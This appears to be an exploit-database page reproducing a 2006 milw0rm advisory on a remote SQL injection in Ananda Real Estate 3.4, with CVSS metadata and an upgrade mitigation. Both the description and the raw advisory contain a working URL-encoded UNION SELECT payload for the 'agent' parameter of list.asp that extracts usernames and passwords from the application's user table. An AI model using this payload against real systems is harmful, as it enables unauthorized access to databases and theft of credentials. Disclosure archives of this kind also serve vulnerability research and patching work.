header-logo
Suggest Exploit
vendor:
Ananda Real Estate
by:
ajann
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ananda Real Estate
Affected Version From: 3.4
Affected Version To: 3.4
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability

Ananda Real Estate version 3.4 and below is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'agent' in the 'list.asp' script. An example of a malicious SQL query is '-1 union select username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where id like 1'

Mitigation:

Upgrade to Ananda Real Estate version 3.5 or later
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40  USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//list.asp?agent=[SQL]

Example:

//list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-24]